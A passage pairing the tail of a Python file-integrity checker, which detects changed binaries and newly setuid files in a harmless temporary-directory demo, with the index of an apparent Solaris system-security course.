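    """True if mode describes a regular file with the setuid or setgid bit set."""
    return stat.S_ISREG(mode) and bool(mode & SUID_SGID_MASK)


def snapshot(root):
    """Map of relative path -> (mode, digest) for every regular file under root.
    lstat is used and non-regular entries are skipped, so a symlink cannot
    stand in for the file it points at."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue
            snap[os.path.relpath(full, root)] = (st.st_mode, file_digest(full))
    return snap


def compare(baseline, current):
    """Differences between two snapshots, each list sorted for stable output."""
    report = {"new_suid": [], "changed_digest": [], "added": [], "missing": []}
    for rel, (mode, digest) in current.items():
        if rel not in baseline:
            report["added"].append(rel)
            if is_suid_or_sgid(mode):
                report["new_suid"].append(rel)   # a privileged program that was never baselined
            continue
        old_mode, old_digest = baseline[rel]
        if is_suid_or_sgid(mode) and not is_suid_or_sgid(old_mode):
            report["new_suid"].append(rel)       # a known file that gained setuid/setgid
        if digest != old_digest:
            report["changed_digest"].append(rel)  # content changed: candidate Trojan horse
    for rel in baseline:
        if rel not in current:
            report["missing"].append(rel)
    for key in report:
        report[key].sort()
    return report


def demo(root):
    """Constructed scenario: baseline one program, then replace its contents
    and add a new setuid program (hypothetical names, not real system files)."""
    os.makedirs(os.path.join(root, "bin"), exist_ok=True)
    ls = os.path.join(root, "bin", "ls")
    with open(ls, "wb") as f:
        f.write(b"original ls binary\n")
    os.chmod(ls, 0o755)
    base = snapshot(root)

    with open(ls, "wb") as f:
        f.write(b"trojaned ls binary\n")   # same mode, different content
    backdoor = os.path.join(root, "bin", "backdoor")
    with open(backdoor, "wb") as f:
        f.write(b"new program\n")
    os.chmod(backdoor, 0o4755)             # setuid bit set on a file not in the baseline
    return compare(base, snapshot(root))


def run_demo():
    """Run the constructed scenario in a throwaway directory and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        return demo(tmp)


if __name__ == "__main__":
    for key, paths in run_demo().items():
        print(f"{key:15} {paths}")
```

The report from the constructed scenario lists bin/ls under changed_digest and bin/backdoor under both added and new_suid. The baseline must of course be stored somewhere the compromised host cannot rewrite (read-only media or another system), which is the same caveat the course attaches to TripWire databases.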

Index

A

access control 1-19
Access Control Lists 8-1, 8-29
Access File Format 15-17
account
    expiration 5-11, 5-12, 5-16, 5-18
    inactivity 5-11, 5-18
    reactivation 5-16
account modules 13-26
accountability 6-10
Accounting Package 2-30, 2-37
ACK 10-36
ACL 8-1
action 2-11
ActiveX 18-12
Aliases 5-28
aliases 7-27
anlpasswd 6-29
Anonymous FTP 13-20, 13-22, 15-5
AntiCrack 6-29
ASET 4-23, 14-1, 14-10, 14-26, 18-21
    Reports 14-35
    Running Periodically 14-33
    Security Levels 14-27
Athena Project 13-42
Attack Level 12-22
Attacker 1-30
Audit
    Classes 3-9
    Data 3-26
    Events 3-8
    Flags 3-14
    flags 3-17
    Records 3-10
    Trail 3-14, 3-22
audit 18-23
audit.log 3-24
audit_warn 3-20
Auditing 3-4
    Techniques 9-6
Authentication 1-17
authentication 13-34
Authentication modules 13-26
authorization 1-19, 7-6
authorized_keys 16-30
Automated Security Enhancement Tool 4-23, 14-1, 14-10
Availability 1-12

B

Back Doors 4-12, 4-13, 4-15, 4-17
backup 1-42
Banner
    Files 15-21
    Message 15-22
    Without TCP Wrappers 15-24
Basic Security Module 3-4, 7-5
Berkeley 13-10
    r Commands 13-10
BIOS 17-9

Break-ins 1-8
BSM 3-1, 3-4, 3-11, 3-40, 7-5
    Audit Trail 4-19
    Components 3-6
    Device Management 3-30, 3-31
bsmconv 3-12
bsmconv script 3-12
bsmunconv 3-13
Buffer Overflow Attack 10-30

C

C++ compiler 1-45
CA 11-7
Centralized Logging 2-13
CERT 14-7
certificate authority 11-7
certificates 16-10
CGI 1-35, 10-32
challenge-response 16-11
Checklists 4-19
Checksums 4-19, 9-9
    Algorithms 9-10
chroot 13-19
Client Access Logging 15-14
Client Authentication 16-11
Client Keys 16-27
client-to-server 18-17
commands
    ckpacct 2-30
    dodisk 2-30
    lastlogin 2-32
    monacct 2-31
    prdaily 2-32
    runacct 2-30
Common Gateway Interface 1-35, 10-32
Compression 16-8
Computer Emergency Response Team 14-7
Computer Vulnerability Emergency Response Team 1-10
comsat 13-5
Confidential 18-24
confidentiality 1-12, 1-19
Configuration Templates 9-20
Console access 17-6
CONSOLE variable 5-21
control flags 13-31
COPS 14-6
Course Preface-i
Courtney 12-35, 18-27
COVERT 1-10
CPU 17-13
crack 1-47
crack Tool 6-28
crackers 6-6
Cracking Passwords 6-25
CRC 4-19, 14-7
Criminals 1-33
cron Entries 5-25
crypt 8-1, 8-39
cryptographer 17-15
Cryptographic One-Way Hash Functions 9-11
Cuckoo’s Egg 5-17
CVS 16-5
cyclic-redundancy-check 4-19, 14-7

D

Data Encryption Standard 11-7, 13-43
Data Harvesting 1-23
Data theft 17-6
databases 9-7
datagram 18-6
Datagrams 11-13
day-zero backups 8-45
DCE 13-25
Debugging Logging 2-14
Default Profiles 5-8
defensive perimeter 18-13
Demilitarized Zone 18-16
demilitarized zone 10-25
Denial of Service 1-11, 1-24, 8-8, 10-33
Denial of Service Attack 4-30
DES 11-7, 13-43
Desk Process 17-17
Device files 13-20
device files 4-15
Device-Clean Scripts 3-36
dial_auth module 13-27
Diffie Hellman algorithm 13-43

Digital Equipment Corporation 13-42
digital identity 16-10
Directory Permissions 8-12
disabling accounts 5-16
disk partition 13-24
disktacct file 2-33
Distributed Computing Environment 13-25
DMZ 10-25, 18-16
DNS 1-35, 18-13
Domain Name Services 1-35
Dormant Accounts 5-17
DoS 1-11, 1-24, 4-1, 4-30, 10-31, 10-33, 17-7
dsniff 10-20
dsniff Utility 10-48
Dummy Services 13-9
duplicate account 5-5
Duplicate User ID 5-5
dynamic content 10-32

E

Eavesdropping 17-13
EEPROM 14-28, 17-1, 17-9, 18-10
    Passwords 17-26
    Security 17-23
eeprom 1-8
electrically erasable programmable read-only memory 1-8
elm 1-8
encapsulating security payload 11-13
encrypted password 6-6, 6-7
Encrypting Data 8-38
Encryption 16-8
Enterprise Security Audits 18-21
Enterprise-Wide Attacks 1-34
ESMTP 10-45
ESP 11-13, 11-23
etherfind 10-12
exec 13-5
Executable command files 13-20
Extended Simple Mail Transfer Protocol 10-45

F

fee file 2-33
file digest 4-19, 9-9
    algorithms 9-9
file mode 9-6
File System Attacks 8-1
File Transfer Protocol 1-10, 1-35
Files Permissions 8-11
find Commands 4-21
finger 1-35, 13-6
fingerd daemon 4-31, 10-30
firewall 18-5
Firewalls 1-35, 10-25, 12-17, 17-10, 18-14
forgetting passwords 6-21
Fork Bombs 4-31, 4-32
Fraud 1-21
FTP 1-10, 1-35, 18-13
ftp 13-5, 13-28
    Users 13-7

G

Generic Security Services 13-25
getfacl 8-31
GID 2-29, 5-7
GNU zip 1-44
grommit 13-11
group ID 5-7, 5-11, 6-5
group identifier 2-29
GSS 13-25
guest account 5-15, 5-16
GUI 12-12
gzip 1-44

H

Hidden 15-9
hidden files 4-17, 5-16
High-level security 14-30
Honey Pots 1-37
Host 1-8
Host Access Control 15-16
Host Key 16-19
hosts.equiv 13-15

how accounting works
    location of files 2-32
    programs that are run 2-30
    types of files 2-33
HTTP 10-2, 10-32
Hubs 17-12
Hyper Text Transfer Protocol 10-32

I

ICMP 1-34, 10-38
identification 1-17
IDS 1-36, 1-37
IETF 11-12
Inadequate Logging 1-35
inbound traffic 11-13
Inconsistencies 9-24
Inode number 9-7
Integrity 1-12
Internet Control Message Protocol 1-34, 10-38
Internet Engineering Task Force 11-12
Internet Protocol 1-34
    Security 10-10
Internet Relay Chat 10-40
Internet Worm 4-31
Intrusion Detection System 1-36
IP 1-34
    Security Architecture 11-12
IPsec 10-10, 11-12, 18-8, 18-21
    Configuration File 11-20
    Configurations 11-24
    ipseckey 11-14
    Keys 11-14
    Policies 11-17
    Security Considerations 11-26
ipsecconf 11-18
IRC 10-40

J

JASS 14-9
Java
    Java Server Pages 10-32
    JSP 10-32
JumpStart 14-4
    Architecture and Security Scripts 14-9

K

Kerberos 13-1, 13-25
    Authentication server 13-43
    Features 13-45
    Limitations 13-47
    v5 13-42
Kernel events 3-8
kill 2-24
Kuang expert system 14-7

L

LAN 17-10
Lax Permissions 8-17
LDAP 3-34, 11-8
Level of Attack 12-16
Lightweight Directory Access Protocol 6-6, 11-8
Linux 14-11
LKMs 4-28
loadable kernel modules 4-28
Local Area Network 17-10
log on
    deny 18-6
    success 18-6
logger Utility 2-15
loghost 2-14
login 5-5, 6-19, 13-5, 13-28, 13-34
Low-level security 14-30

M

MAC 17-12
major device number 4-15
mask bits 8-35
Massachusetts Institute of Technology 13-42
Maximum Transfer Unit 10-38
MD5 Digests 1-46
Medium-level security 14-30
Message Digest 1-46, 9-11, 11-7

    Algorithms 9-11
minfree 3-20
minor device number 4-15
Misconfigured access control 1-34
MIT 13-42
mknod 4-15
mnemonic 6-13
mode bits 8-10
MTU 10-38

N

NetBIOS 1-34
Netgroups 13-12
Network Analyzer Attack 12-33
Network Attacks 4-32
Network Authentication 15-4
Network File Service 12-7
Network Information Service 6-6
network interface card 10-7
Network Service Attack 10-25
Network Sniffing 10-4
Network tapping 17-7
NFS 12-7
NIC 10-7
NIS 3-34, 6-6
NIS+ 3-34, 6-6
nmap Utility 10-43
no password 6-19
Non-Login Accounts 5-22
Non-Login Shell 5-24
Non-Standard Port Numbers 13-9
notification messages 2-9
npasswd 6-29
numeric password 6-24

O

OpenBoot 17-21
OpenSSH 16-4, 18-21
    Clients 16-23
    Server
        Configuration 16-16
    Tools 16-6
OpenSSL 11-5, 11-9
optional 13-32
Orange Book 1-14
outbound traffic 11-13

P

pacct file 2-33
Packet Replay Attack 10-26
PAM 13-1, 13-25, 13-28
    API 13-25
    Configuration File 13-29
    Error Reporting 13-40
    Library 13-28
    Runtime Modules 13-26
pam_dial_auth 13-34
pam_rhost_auth 13-34
pam_unix 13-34
pam_unix Module 13-27
passwd 6-15, 13-16
passwd+ 6-29
password 1-34, 1-42
    Agent 16-15
    aging 1-42, 6-7
    cracking 6-11, 6-12, 6-21
    expiration 6-8
    Guessing 12-25
    length 6-12
    mapping 13-27
    modification 6-7
    modules 13-26
    restrictions 6-15, 6-19
    secrecy 6-11, 6-14
    Security 6-1
password modules 13-26
PATH variable 5-16, 5-21
Perl 12-4
Permission
    bits 8-10
    Categories 8-13
Personal 18-24
Physical
    Access 17-1
    Intrusion 17-4
        Types 17-6
PIN number 6-24
Ping of death 4-32, 10-35, 10-38

Pluggable Authentication Module 13-25
POP3 10-2
Port forwarding 16-12
Port Scanning 10-43
PortSentry 10-46
Post Office Protocol 3 10-2
Power outage 17-7
praudit 3-27
Privacy Violation 1-22
Probes 12-23
probes 12-6
Process Accounting 2-29
Profiles 7-6
prototype 15-21
Proximity Variables 12-28
Proxy Server 18-12
proxy server 10-25, 18-1
Proxy Servers 18-14
ps 2-24, 5-16
Public 18-24
public key encryption 16-4
Public Keys 1-46
Publicity Attacks 1-23

R

RBAC 6-10, 7-1, 7-4
    Commands 7-7
    Evaluation 7-18
    Profiles 7-8
    Roles 7-11, 7-15
RC4 11-7
rcp 13-11, 16-4
reboot 10-34
Redhat 14-11
Reference Monitor 1-13
remembering passwords 6-12
Remote Access 1-34, 16-1
Remote Procedure Call 1-35
required 13-32
requisite 13-31
reset 10-37
Restoring 14-32
Restoring Data 8-47
restricted files 4-16
Restricted Shells 5-16, 5-27
rhosts_auth module 13-27
Rivest Shamir Adleman 13-43
rlogin 13-10, 13-16, 13-34, 13-38, 16-4
Role Based Access Control 6-10, 7-1, 7-4
Roles 7-6
root 1-8, 2-7
    Partition 8-4
Root Access 7-1, 7-4
Root Login 5-14
Rootkits 4-24
    Kernel 4-28
Routers 1-34, 17-10, 18-14
RPC 1-35, 13-6
rpcinfo 1-35
RSA 13-43
    Authentication 16-30
    public key 16-9
rsh 13-10, 13-16, 13-38, 16-4
RST 10-37
rusers 1-35
rusersd 13-6

S

SA 11-13
Sabotage 1-22
SAINT 1-38, 10-46, 12-1, 12-4, 18-21, 18-26
    Configuration 12-21
    Data Management 12-14
    graphical user interface 12-1, 12-12
    Installation 12-8
    Reports 12-31
    Scan 12-18
    Target Selection 12-15
sandbox 13-20
SANTA 1-38
sar 2-24
SATAN 1-38, 12-4
Script 1-31
Script Kiddie 1-33
SEAM 13-25, 13-42
    Clients 13-49
Secret 18-24
Secure Hash Algorithm 11-7
Secure Kernel 1-13
secure passwords 6-12, 6-13, 6-21

Secure Shell 10-10, 13-5, 16-4
Secure Socket Layer 16-10
Secure Sockets Layer 10-10, 11-1
Security 1-4
security associations 11-13
Security Attacks
    Detection 9-8
security policy 1-39, 1-41, 5-16
selector 2-11
sendmail 10-28
Server Authentication 16-9
server-to-server 18-17
session modules 13-26
Set User ID 14-6
setfacl 8-33, 8-34
SETGID 7-18
SetUID 14-7
Shadow Files 6-4
Shared libraries 13-20
shell 13-5
Shell Daemon 16-21
shoulder surfing 6-13
shutdown 7-20
signatures 9-7
Simple Alias Definitions 7-27
Simple Mail Transfer Protocol 1-35
simple mail transfer protocol 10-28
Simple Network Management Protocol 1-35, 10-2
Site Policy 1-47
SKIP 11-27, 11-28, 11-30
skiphost 11-30
skipif 11-29
skiplocal 11-28, 11-30
SMTP 1-35, 10-28, 17-19
Smurf 4-32, 10-35, 10-39
    Attack 10-39
    Countermeasures 10-41
sniffing tools 1-47
SNMP 1-35, 10-2
snoop 5-16, 10-12, 10-14
Software 1-35
Solaris
    Security Toolkit 14-9
Solaris OE 14-9
    Accounting Package 2-27
    Basic Security Module 3-1
    Basic Security Module Auditing 3-4
    Fingerprint Database 9-1, 9-13
    Logging Files 2-4
    Monitoring Tools 2-23
    password files 6-4
    Role Based Access Control 7-5
    security packages 7-5
    system administrator 2-4
    utilities 12-6
SPARC 9-13
special character 6-13
sprayd 13-6
SSH 10-10, 13-5, 16-4
ssh-agent 16-31
sshd 16-19
ssh-keygen 16-19, 16-27
ssh-keyscan 16-10
SSL 10-10, 11-1, 11-6, 16-10, 18-13, 18-21
    Handshake Protocol 11-6
    Record Protocol 11-6
SSLeay library 11-5
starting and stopping accounting 2-37
stdtprocess 8-8
Sticky Bits 8-24
Sticky Directories 8-25
STOP-A key 17-1
Stop-A Key 17-21
stunnel Program 11-8
su command 3-5
subterfuge 1-9
sudo 6-10, 7-20
    privileges 7-24
    Utility 7-24
sudoers 7-25, 7-31
sufficient 13-32, 13-34
SUID 4-14, 5-16, 14-6
    programs 5-16
sulog 2-7
SULOG variable 5-21
Sun Enterprise Authentication Mechanism 13-25, 13-42
SunScreen 18-7
SunSHIELD 3-4
SunSolve 9-13
SUNWast 14-29

SUPATH variable 5-21
Superuser Account 5-13
superuser password 6-4, 6-10, 6-16, 6-19
SuSE 14-11
swap 8-6
swatch Tool 2-16
symmetric key 8-39
SYN 4-32, 10-36
synchronize message 10-36
Syslog 2-8, 2-9
SYSLOG flag 5-21
syslogd 7-20
System Hardening 14-4
System Logging Facility 2-8
System Permissions 8-10
system-wide access 6-4

T

TAR 12-8
tar 13-21
Task Status 14-32
TCB 1-13
TCP 4-32
    Wrappers 15-1, 15-8, 18-21
        Banners 15-19
        Configuration 15-12
        Configuring 15-9
        Hidden 15-10
        Spawn Commands 15-25
        Visible 15-11
TCP SYN Flood 10-35
TCP/IP
    Ports
        Forwarding 16-12
tcpdchk 15-12
telnet 1-35, 13-1, 13-5, 13-17, 13-28
temporary file system 8-6
Terminal Answerback 4-9
Terrorism 1-22
Terrorists 1-33
TFTP 13-20
Theft 1-21
Third-Party Security Tools 1-43
Tiger 14-8
Time stamps 9-7
Time-Out 12-27
Titan 14-1, 14-10, 18-21
    Configuration 14-18, 14-20
    Design Goals 14-12
    Module Structure 14-23
    Modules 14-13
    Running a Single Module 14-21
TLS 11-5
tmpfs 8-6
Toll-Free Number Attack 4-32
top Tool 2-25
Transport Layer Security 11-5
Trial Attacks 18-22
TripWire 4-19, 9-1, 9-15, 9-23
    Configuration File 9-17
    Database 9-23, 9-27
Trivial File Transfer Protocol 13-20
Trojan Horses 4-1, 4-4
Troubleshooting 2-28
Trusted Access 13-15
trusted computing base 1-13
trusted hosts 13-15
Trusted Solaris™ Operating Environment B-1
trusted third party 11-7
tune.* Files 14-36
types of accounting
    process accounting 2-29

U

UFS 8-5
UID 2-29, 5-4, 8-20
unauthorized access 1-4
Unauthorized Device Files 8-42
UNIX
    Copy 13-6
UNIX file system 8-5
UNIX® 1-5
User access 1-5
User Account 1-34
user ID 5-11, 5-21, 6-5
User identifier 2-29
User Security 5-21
User-level events 3-8
usermod 5-11, 5-12

Using Aliases 7-27
UUCP 13-6

V

vi 7-33
Virtual Private Network 1-34, 11-8
virtual private network 18-8
Visible 15-9
vmstat 2-24
VPN 1-34, 11-8, 18-8, 18-17
Vulnerability Scanners 1-38

W

wallace 13-12
walld 13-6
WAN 17-10
what is accounting used for 2-28
who 2-24
whodo 2-24
Wide Area Network 17-10
Windows
    NT 12-16
World Wide Web 1-27
worms 4-31
wtmp file 2-33
WWW 1-27
